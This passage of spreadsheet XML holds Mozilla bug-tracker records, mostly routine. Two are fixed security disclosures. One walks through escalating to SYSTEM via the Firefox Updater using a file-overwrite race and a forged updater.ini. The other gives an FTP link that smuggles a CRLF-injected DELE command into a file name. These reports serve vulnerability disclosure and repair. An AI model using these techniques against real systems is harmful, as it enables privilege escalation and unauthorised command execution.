      <c r="F1430" t="n">
        <v>1</v>
      </c>
      <c r="G1430" t="n">
        <v>7</v>
      </c>
      <c r="H1430" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1430" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1430" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1430" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1430" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1430" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1430" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1430" t="inlineStr"/>
      <c r="Q1430" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1430" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1430" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1430" t="n">
        <v>1</v>
      </c>
      <c r="U1430" t="n">
        <v>0</v>
      </c>
      <c r="V1430" t="n">
        <v>8</v>
      </c>
      <c r="W1430" t="inlineStr">
        <is>
          <t>STR:
1. Login to Treeherder with Persona from the top-left corner of the UI.
Expected results: I'm authenticated and can perform tasks that require authentication.
Actual results: The login fails silently with the following response body for /browserid/login/:
&gt; Forbidden &lt;span&gt;(403)
&gt; 
&gt; CSRF verification failed. Request aborted.
&gt; 
&gt; You are seeing this message because this site requires a CSRF cookie
&gt; when submitting forms. This cookie is required for security reasons,
&gt; to ensure that your browser is not being hijacked by third parties.
&gt; 
&gt; If you have configured your browser to disable cookies, please 
&gt; re-enable them, at least for this site, or for 'same-origin' requests.
Further information:
- This failure occurs also with a clean profile for both Firefox 40 and Chromium 44.
- I'm not a Mozilla employee but the email I'm using to log into Persona is the same as for my level 1 commit access LDAP account (see my BMO email).
- I've successfully logged in to Treeherder previously.
- The request to browserid/login does not contain any cookies.
The request headers are:
&gt; POST /browserid/login/ HTTP/1.1
&gt; Host: treeherder.mozilla.org
&gt; User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
&gt; Accept: application/json, text/plain, */*
&gt; Accept-Language: fi-FI,fi;q=0.8,en-US;q=0.5,en;q=0.3
&gt; Accept-Encoding: gzip, deflate
&gt; DNT: 1
&gt; Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&gt; Referer: https://treeherder.mozilla.org/
&gt; Content-Length: 1838
&gt; Connection: keep-alive
&gt; Pragma: no-cache
&gt; Cache-Control: no-cache
And the response headers:
&gt; HTTP/1.1 403 FORBIDDEN
&gt; Server: gunicorn/19.3.0
&gt; X-Backend-Server: treeherder1.webapp.scl3.mozilla.com
&gt; Vary: Accept-Encoding
&gt; Cache-Control: max-age=900
&gt; Content-Type: text/html; charset=UTF-8
&gt; Content-Encoding: gzip
&gt; Date: Sun, 23 Aug 2015 04:15:00 GMT
&gt; Keep-Alive: timeout=5, max=1000
&gt; Expires: Sun, 23 Aug 2015 04:30:00 GMT
&gt; Transfer-Encoding: chunked
&gt; Connection: Keep-Alive
This seems to be very similar to bug 1197368 but since that only talks about creating a new account, I though to log a separate one.</t>
        </is>
      </c>
      <c r="X1430" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" t="n">
        <v>699866</v>
      </c>
      <c r="B1431" t="inlineStr">
        <is>
          <t>2011-11-04 11:07:48 -0700</t>
        </is>
      </c>
      <c r="C1431" t="inlineStr">
        <is>
          <t>[Tracker] Registration flow is a bit too long and complicated</t>
        </is>
      </c>
      <c r="D1431" t="inlineStr">
        <is>
          <t>2013-05-20 16:12:18 -0700</t>
        </is>
      </c>
      <c r="E1431" t="n">
        <v>1</v>
      </c>
      <c r="F1431" t="n">
        <v>1</v>
      </c>
      <c r="G1431" t="n">
        <v>5</v>
      </c>
      <c r="H1431" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1431" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J1431" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K1431" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1431" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1431" t="inlineStr">
        <is>
          <t>[UX][Re-Design]</t>
        </is>
      </c>
      <c r="Q1431" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1431" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1431" t="inlineStr">
        <is>
          <t>2012-09-12</t>
        </is>
      </c>
      <c r="T1431" t="n">
        <v>1</v>
      </c>
      <c r="U1431" t="n">
        <v>0</v>
      </c>
      <c r="V1431" t="n">
        <v>38</v>
      </c>
      <c r="W1431" t="inlineStr">
        <is>
          <t>Created attachment 572023
registration userflow &amp; associated gaps
I went through the log-in process today and found a couple of issues in the flow. The attached screenshot shows some of the major issues present and possible solutions to the problems.
Issue #1: After confirmation, users need to click on a link to go to the log-in page
Issue #2: After initial log-in, users see a splash screen. It's not entirely obvious on what to do with the app after registration.</t>
        </is>
      </c>
      <c r="X1431" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" t="n">
        <v>546530</v>
      </c>
      <c r="B1432" t="inlineStr">
        <is>
          <t>2010-02-16 14:59:17 -0800</t>
        </is>
      </c>
      <c r="C1432" t="inlineStr">
        <is>
          <t>"ASSERTION: Attempting to allocate excessively large array" with execCommand("outdent"), combining acute accent</t>
        </is>
      </c>
      <c r="D1432" t="inlineStr">
        <is>
          <t>2010-07-15 13:56:01 -0700</t>
        </is>
      </c>
      <c r="E1432" t="n">
        <v>1</v>
      </c>
      <c r="F1432" t="n">
        <v>1</v>
      </c>
      <c r="G1432" t="n">
        <v>3</v>
      </c>
      <c r="H1432" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1432" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1432" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1432" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1432" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1432" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1432" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1432" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1432" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1432" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1432" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1432" t="n">
        <v>1</v>
      </c>
      <c r="U1432" t="n">
        <v>0</v>
      </c>
      <c r="V1432" t="n">
        <v>17</v>
      </c>
      <c r="W1432" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #499844 +++
Testcase: https://bugzilla.mozilla.org/attachment.cgi?id=384527
###!!! ASSERTION: Attempting to allocate excessively large array: 'Error', file nsTArray.cpp, line 69
See bug 499844 comment 14, 16 and 17.</t>
        </is>
      </c>
      <c r="X1432" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" t="n">
        <v>1342742</v>
      </c>
      <c r="B1433" t="inlineStr">
        <is>
          <t>2017-02-26 00:19:04 -0800</t>
        </is>
      </c>
      <c r="C1433" t="inlineStr">
        <is>
          <t>Arbitrary code execution as SYSTEM using Updater to overwrite updater.ini</t>
        </is>
      </c>
      <c r="D1433" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:43 -0700</t>
        </is>
      </c>
      <c r="E1433" t="n">
        <v>1</v>
      </c>
      <c r="F1433" t="n">
        <v>1</v>
      </c>
      <c r="G1433" t="n">
        <v>3</v>
      </c>
      <c r="H1433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1433" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1433" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1433" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1433" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1433" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1433" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q1433" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1433" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1433" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1433" t="n">
        <v>1</v>
      </c>
      <c r="U1433" t="n">
        <v>0</v>
      </c>
      <c r="V1433" t="n">
        <v>53</v>
      </c>
      <c r="W1433" t="inlineStr">
        <is>
          <t>Created attachment 8841306
poc + source.zip
An unprivileged, standard, Windows user can execute arbitrary code as SYSTEM using the Firefox Updater (via the Maintenance Service).
This is possible by combining two bugs. The first is that the Updater can be tricked into executing an arbitrary PostUpdate file by the updater.ini file after a successful action is performed. The second allows overwrite of any file as SYSTEM with partially attacker controlled data.
We use the overwrite bug to write a new updater.ini, which triggers an install of Firefox into an attacker controlled directory which allows arbitrary code execution via the maintenanceservice_installer.exe binary.
# Reproduction
I've attached a poc + source, to run it you'll need the full update.mar for the current installed version of Firefox [0] (or higher), as well as a full firefox installer [1]. The poc can be run as follows:
firefox_poc.exe payload.exe firefox-51.0.1.complete.mar "Firefox Setup 51.0.1.exe" C:\Program Files (x86)\Mozilla Firefox
The payload.exe is the file to be executed as SYSTEM. The final argument needs to be a legitimate Firefox installation directory, and will default to C:\Program Files(x86)\Mozilla Firefox if not supplied. One of the bugs relies on a small race condition, which has always executed in less than a minute for me but let me know if you have any problems. It will continue trying until it succeeds or you use ctrl+c to kill it.
The included payload.exe just runs "whoami &gt; /foo.txt", which should create a foo.txt file in your drive root with the contents "nt authority\system".
# ExeRelPath in updater.ini allows execution of arbitrary Mozilla binaries using absolute paths
 The ExeRelPath entry in the C:\Program Files (x86)\Mozilla Firefox\updater.ini file is executed by the updater after a successful action is made. There are allowances made to prevent directory traversal using '..', however if an absolute file path is provided instead of a filename then PathAppendSafe [2] (which uses PathAppendW) will return the absolute file path instead.
 Eg. PathAppendW("C:\Program Files (x86)\Mozilla Firefox", "C:\some\mozilla.exe")
 		=&gt; "C:\some\mozilla.exe"
The updater will happily execute this file, as long as it is signed by Mozilla with a current certificate. We can use then use these binaries in ways never intended to gain arbitrary code execution.
The avenue used in this proof of concept is to use the Firefox setup.exe to install Firefox into an attacker controlled directory [3], which then executes whatever is in the maintenanceservice_installer.exe file on post-install (in fairness, this would have no practical chance of being intercepted otherwise). I imagine there are similar avenues in other Mozilla signed binaries, however I have not investigated them.
# Arbitrary file overwrite with partial content injection
Soon after the updater starts, updater.cpp [4] calls LogInit, which calls GetTempFileNameW with the attacker-supplied patch directory to get a temp filename for the log file. By providing a file which starts with \\.\, GetTempFileNameW will just copy the input into the output buffer instead of providing a valid temp directory.
Eg. GetTempFileNameW("\\.\c:\target\file.txt", L"log", 0, mTmpFilePath)
		=&gt; mTmpFilePath = "\\.\c:\target\file.txt"
Since it is essentially a normal file path, the log file will happily truncate and write to this file.
We can insert up to 260 characters at some point in the file using the fact that the working directory argument gets logged in updater.cpp [5]. The resulting file ends up looking something like the following (ABC's are user supplied):
	Performing a replace request
	PATCH DIRECTORY \\.\C:\target\file.txt
	INSTALLATION DIRECTORY C:\Program Files (x86)\Mozilla Firefox
	WORKING DIRECTORY AAAAAAAAAAAAAAA
	BBBBBBBBBBBBBBBBBB
	CCCCCCCCCCCCCCCCCC
	The apply-to directory must be the same as or a child of the installation directory! Exiting.
In order to reach the line of code which logs the working directory argument, we need to first avoid a failure of WriteStatusFile [6], otherwise the updater will exit early and we will only truncate the file without our content written. The reason WriteStatusFile fails is that it tries to move a file to &lt;patch-dir&gt;/update.status, which in this case is \\.\c:\target\file.txt\update.status, which is not possible because file.txt is a file.
However, if we create a directory junction in an attacker controlled directory, eg. c:\exploit\junction\ pointing to c:\target\, then we can supply that to the updater instead. Now after the updater has opened a file descriptor to file.txt, we race it to switch the junction out with a directory named file.txt before it has attempted the status file move. If we win the race, the updater creates c:\exploit\junction\file.txt\update.status and execution continues.
# Arbitrary code execution
Because GetPrivateProfileStringW [7] isn't very picky about the formatting of the updater.ini, we can use the arbitrary file overwrite to replace the C:\Program Files (x86)\Mozilla Firefox\updater.ini with one which looks like this:
	Performing a replace request
	PATCH DIRECTORY \\.\C:\temp\ff-exploit\overwrite-target\updater.ini
	INSTALLATION DIRECTORY C:\Program Files (x86)\Mozilla Firefox
	WORKING DIRECTORY 
	[PostUpdateWin]
	ExeRelPath=C:\temp\ff-exploit\setup-dir\ff_setup.exe
	ExeArg=/INI=C:\temp\ff-exploit\setup-dir\ff_setup.ini
	The apply-to directory must be the same as or a child of the installation directory! Exiting.
The ff_setup.ini has the InstallDirectoryPath entry set to an attacker controlled directory, eg. c:\temp\ff-exploit\new-firefox\ and the MaintenanceService entry set to true. The attacker just needs to copy their payload.exe into c:\temp\ff-exploit-new-firefox\maintenanceservice_installer.exe and keep it locked for shared reads (so it can't be overwritten on install, but can be executed).
Then, we trigger some action which will succeed, like staging an upate.mar file
 	-&gt; which will execute the PostUpdateWin command
 	-&gt; which will install a new copy of firefox into the attacker controlled c:\temp\ff-exploit\new-firefox\ directory
 	-&gt; which will then run the maintenanceservice_install.exe payload as SYSTEM
Let me know if you need any more information. I tested on Windows 8.1 x64, Firefox 51.0.1
[0] - http://archive.mozilla.org/pub/firefox/releases/51.0.1/update/win32/en-US/firefox-51.0.1.complete.mar
[1] - http://archive.mozilla.org/pub/firefox/releases/51.0.1/win32/en-US/Firefox%20Setup%2051.0.1.exe
[2] - https://dxr.mozilla.org/mozilla-central/rev/f36062d04d165f6f6e781cf0633ffcbbebe6c273/toolkit/mozapps/update/updater/updater.cpp#2029
[3] - https://wiki.mozilla.org/Installer:Command_Line_Arguments
[4] - https://dxr.mozilla.org/mozilla-central/rev/f36062d04d165f6f6e781cf0633ffcbbebe6c273/toolkit/mozapps/update/updater/updater.cpp#2937
[5] - https://dxr.mozilla.org/mozilla-central/rev/f36062d04d165f6f6e781cf0633ffcbbebe6c273/toolkit/mozapps/update/updater/updater.cpp#2958
[6] - https://dxr.mozilla.org/mozilla-central/rev/f36062d04d165f6f6e781cf0633ffcbbebe6c273/toolkit/mozapps/update/updater/updater.cpp#2939
[7] - https://dxr.mozilla.org/mozilla-central/rev/f36062d04d165f6f6e781cf0633ffcbbebe6c273/toolkit/mozapps/update/updater/updater.cpp#2005</t>
        </is>
      </c>
      <c r="X1433" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" t="n">
        <v>1742692</v>
      </c>
      <c r="B1434" t="inlineStr">
        <is>
          <t>2021-11-23 12:21:04 -0800</t>
        </is>
      </c>
      <c r="C1434" t="inlineStr">
        <is>
          <t>Firefox attempts to load some modules from the install directory if PreferSystem32Images is on</t>
        </is>
      </c>
      <c r="D1434" t="inlineStr">
        <is>
          <t>2022-09-07 13:26:38 -0700</t>
        </is>
      </c>
      <c r="E1434" t="n">
        <v>1</v>
      </c>
      <c r="F1434" t="n">
        <v>1</v>
      </c>
      <c r="G1434" t="n">
        <v>3</v>
      </c>
      <c r="H1434" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1434" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1434" t="inlineStr">
        <is>
          <t>DLL Services</t>
        </is>
      </c>
      <c r="K1434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1434" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1434" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1434" t="inlineStr">
        <is>
          <t>[adv-main96+]</t>
        </is>
      </c>
      <c r="Q1434" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1434" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1434" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T1434" t="n">
        <v>1</v>
      </c>
      <c r="U1434" t="n">
        <v>0</v>
      </c>
      <c r="V1434" t="n">
        <v>9</v>
      </c>
      <c r="W1434" t="inlineStr">
        <is>
          <t>For Windows 10, we enable `PreferSystem32Images` in the launcher process, so the main process and the child processes load the system DLLs from the system directory before searching the current directory.  However, Firefox still searches the current directory for some system DLLs that are statically dependent on firefox.exe or mozglue.dll.  This is not a critical security risk because the install directory is by default protected and a user is responsible for managing it, but this behavior is not intended or ideal.
Here are the list of the target modules.
- version.dll: Firefox.exe has delay-loaded version.dll, but mozglue.dll directly imports version.dll.
- dbghelp.dll: Same as version.dll.  This is directly imported from mozglue.dll.
- MSASN1.dll: mozglue.dll statically imports wintrust.dll that delayloads MSASN1.dll.
- CRYPTBASE.DLL: The export table entry of `RtlGenRandom` is in advapi32.dll, but its destination is in CRYPTBASE.DLL.  In this case, even if we load advapi32.dll from the system directory, we search the current directory for CRYPTBASE.DLL.
In Nightly, we also search the current directory for [JitPI.dll](https://searchfox.org/mozilla-central/source/js/src/vtune/jitprofiling.c#261) (Intel VTune profiler?), but the loading code is not compiled in the release version.</t>
        </is>
      </c>
      <c r="X1434" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" t="n">
        <v>620644</v>
      </c>
      <c r="B1435" t="inlineStr">
        <is>
          <t>2010-12-21 03:10:49 -0800</t>
        </is>
      </c>
      <c r="C1435" t="inlineStr">
        <is>
          <t>Major changes of some English articles don't show up in localization dashboards, if the localized article has not been edited after migration</t>
        </is>
      </c>
      <c r="D1435" t="inlineStr">
        <is>
          <t>2011-02-14 14:54:01 -0800</t>
        </is>
      </c>
      <c r="E1435" t="n">
        <v>1</v>
      </c>
      <c r="F1435" t="n">
        <v>1</v>
      </c>
      <c r="G1435" t="n">
        <v>5</v>
      </c>
      <c r="H1435" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1435" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1435" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1435" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1435" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1435" t="inlineStr"/>
      <c r="Q1435" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1435" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1435" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T1435" t="n">
        <v>1</v>
      </c>
      <c r="U1435" t="n">
        <v>0</v>
      </c>
      <c r="V1435" t="n">
        <v>15</v>
      </c>
      <c r="W1435" t="inlineStr">
        <is>
          <t>Major changes on "Template:optionspreferences" don't show up in some localization dashboards. For instance, fr, it, pt-BR and ru locales are impacted.
It works well for some other locales as de, because there have been changes in this template after SUMO migration.</t>
        </is>
      </c>
      <c r="X1435" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" t="n">
        <v>648206</v>
      </c>
      <c r="B1436" t="inlineStr">
        <is>
          <t>2011-04-06 22:29:09 -0700</t>
        </is>
      </c>
      <c r="C1436" t="inlineStr">
        <is>
          <t>"ASSERTION: bad this object in get" or crash [@ xpc::holder_get] with InstallTrigger</t>
        </is>
      </c>
      <c r="D1436" t="inlineStr">
        <is>
          <t>2011-11-14 18:49:54 -0800</t>
        </is>
      </c>
      <c r="E1436" t="n">
        <v>1</v>
      </c>
      <c r="F1436" t="n">
        <v>1</v>
      </c>
      <c r="G1436" t="n">
        <v>3</v>
      </c>
      <c r="H1436" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1436" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1436" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1436" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1436" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1436" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1436" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1436" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q1436" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1436" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1436" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T1436" t="n">
        <v>1</v>
      </c>
      <c r="U1436" t="n">
        <v>0</v>
      </c>
      <c r="V1436" t="n">
        <v>7</v>
      </c>
      <c r="W1436" t="inlineStr">
        <is>
          <t>Symptoms are exactly the same as old bug 608963:
Debug:
###!!! ASSERTION: bad this object in set: 'wrapper-&gt;isProxy()', file js/src/xpconnect/wrappers/XrayWrapper.cpp, line 207
Assertion failure: isProxy(), at jsproxy.h:193
Opt:
Crash bp-8c6523b2-2b06-4848-9cbb-089062110406 [@ xpc::holder_set ]
Filing as security-sensitive because InstallTrigger/wrappers is a sensitive area.</t>
        </is>
      </c>
      <c r="X1436" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" t="n">
        <v>1347262</v>
      </c>
      <c r="B1437" t="inlineStr">
        <is>
          <t>2017-03-14 12:15:45 -0700</t>
        </is>
      </c>
      <c r="C1437" t="inlineStr">
        <is>
          <t>Potential Skia overflow due to round_asymmetric_to_int bug</t>
        </is>
      </c>
      <c r="D1437" t="inlineStr">
        <is>
          <t>2017-09-21 12:42:48 -0700</t>
        </is>
      </c>
      <c r="E1437" t="n">
        <v>1</v>
      </c>
      <c r="F1437" t="n">
        <v>1</v>
      </c>
      <c r="G1437" t="n">
        <v>3</v>
      </c>
      <c r="H1437" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1437" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1437" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1437" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1437" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1437" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q1437" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1437" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1437" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1437" t="n">
        <v>1</v>
      </c>
      <c r="U1437" t="n">
        <v>0</v>
      </c>
      <c r="V1437" t="n">
        <v>12</v>
      </c>
      <c r="W1437" t="inlineStr">
        <is>
          <t>Upstream Skia security bug (https://bugs.chromium.org/p/skia/issues/detail?id=6294) details a variant of bug 1330166 that was not handled by that fix. All relevant security details of this bug should basically be the same as in bug 133016, just that this is a new way to trigger it. I've fixed up that case now with this patch that ensures the rounding is properly biased for all sides of the bounds rect.
This patch was submitted upstream here: https://skia-review.googlesource.com/c/9700/</t>
        </is>
      </c>
      <c r="X1437" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" t="n">
        <v>1702374</v>
      </c>
      <c r="B1438" t="inlineStr">
        <is>
          <t>2021-03-31 17:29:33 -0700</t>
        </is>
      </c>
      <c r="C1438" t="inlineStr">
        <is>
          <t>Arbitrary ftp command execution using ftp URLs</t>
        </is>
      </c>
      <c r="D1438" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:40 -0700</t>
        </is>
      </c>
      <c r="E1438" t="n">
        <v>1</v>
      </c>
      <c r="F1438" t="n">
        <v>1</v>
      </c>
      <c r="G1438" t="n">
        <v>6</v>
      </c>
      <c r="H1438" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1438" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1438" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K1438" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1438" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1438" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][adv-main88+] [adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q1438" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1438" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1438" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T1438" t="n">
        <v>1</v>
      </c>
      <c r="U1438" t="n">
        <v>0</v>
      </c>
      <c r="V1438" t="n">
        <v>24</v>
      </c>
      <c r="W1438" t="inlineStr">
        <is>
          <t>Created attachment 9212965
ftps.py
On Firefox 87.0 (64-bit) FTP URLs (e.g. ftp://xxxx/yyy) allow the control characters %0A and %0D as part of the filename. This allows an attacker to craft a link that when accessed by a victim with the proper permissions will execute arbitrary commands on the FTP server.
The following steps can be used to reproduce the issue:
* To emulate an FTP server, run the attached ftps.py FTP server (you need to install pyftpdlib first)
* On the same directory create a file named test
* Create an HTML page containing link like: &lt;a href="ftp://[YOUR_FTP_SERVER_ADDRESS]/A%0D%0ADELE%20test"&gt;Download&lt;/a&gt;
* From a machine running Firefox 87.0 with network access to the FTP server access the malicious page and click on the link
* Check the test file is deleted
IMPACT
An attacker may force a victim to execute FTP commands on a server on which the attacker has no previous access. Moreover,  allowing control characters in FTP URLs may permit NAT slipstreaming attacks depending on the victim's router's configuration and FTP ALG implementation.</t>
        </is>
      </c>
      <c r="X1438" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" t="n">
        <v>460425</v>
      </c>
      <c r="B1439" t="inlineStr">
        <is>
          <t>2008-10-17 02:59:21 -0700</t>
        </is>
      </c>
      <c r="C1439" t="inlineStr">
        <is>
          <t>[FIX].desktop allows remotely loading "about:config" &amp; "about:plugins" with little user interaction</t>
        </is>
      </c>
      <c r="D1439" t="inlineStr">
        <is>
          <t>2009-03-04 18:49:03 -0800</t>
        </is>
      </c>
      <c r="E1439" t="n">
        <v>1</v>
      </c>
      <c r="F1439" t="n">
        <v>1</v>
      </c>
      <c r="G1439" t="n">
        <v>3</v>
      </c>
      <c r="H1439" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1439" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1439" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K1439" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1439" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1439" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1439" t="inlineStr">
        <is>
